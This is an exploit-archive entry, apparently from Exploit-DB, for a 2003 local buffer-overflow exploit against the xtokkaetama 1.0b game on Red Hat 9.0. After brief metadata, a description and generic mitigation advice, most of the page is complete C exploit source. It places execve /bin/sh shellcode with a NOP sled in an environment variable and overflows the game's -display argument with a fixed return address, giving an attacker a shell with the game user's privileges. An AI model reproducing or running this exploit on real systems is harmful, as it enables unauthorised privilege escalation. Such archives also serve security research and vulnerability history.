xtokkaetama 1.0b local game exploit on Red Hat 9.0

vendor:

xtokkaetama

by:

brahma

7.5

CVSS

HIGH

Local game exploit

119

CWE

Product Name: xtokkaetama

Affected Version From: 1.0b

Affected Version To: 1.0b

Patch Exists: NO

Related CWE:

CPE: a:xtokkaetama:xtokkaetama:1.0b

Metasploit:

Other Scripts:

Platforms Tested: Red Hat 9.0

2003

xtokkaetama 1.0b local game exploit on Red Hat 9.0

The xtokkaetama 1.0b local game exploit on Red Hat 9.0 allows an attacker to execute arbitrary code with the privileges of the game user. The vulnerability is caused by a buffer overflow in the xtokkaetama game binary. By providing a specially crafted input, an attacker can overwrite the return address and gain control of the program flow, allowing the execution of arbitrary code. This exploit targets Red Hat 9.0 and requires local access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the xtokkaetama game binary to a patched version that fixes the buffer overflow issue. It is also recommended to restrict access to the game executable and ensure that only trusted users have access to it.

Source

Exploit-DB raw data:

/*
*  xtokkaetama 1.0b local game exploit on Red Hat 9.0
*               Coded by brahma (31/07/2003)
*
*       http://www.debian.org/security/2003/dsa-356
*/


#include <stdlib.h>
#define RETADDR 0xbfffff11 
#define DEFAULT_BUFFER_SIZE 29
#define DEFAULT_EGG_SIZE 512 
#define NOP 0x90
#define BIN "/usr/X11R6/bin/xtokkaetama" 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) eggsize = atoi(argv[2]);


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = RETADDR; 
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);
execl(BIN,BIN,"-display",buff,NULL);
}



// milw0rm.com [2003-08-01]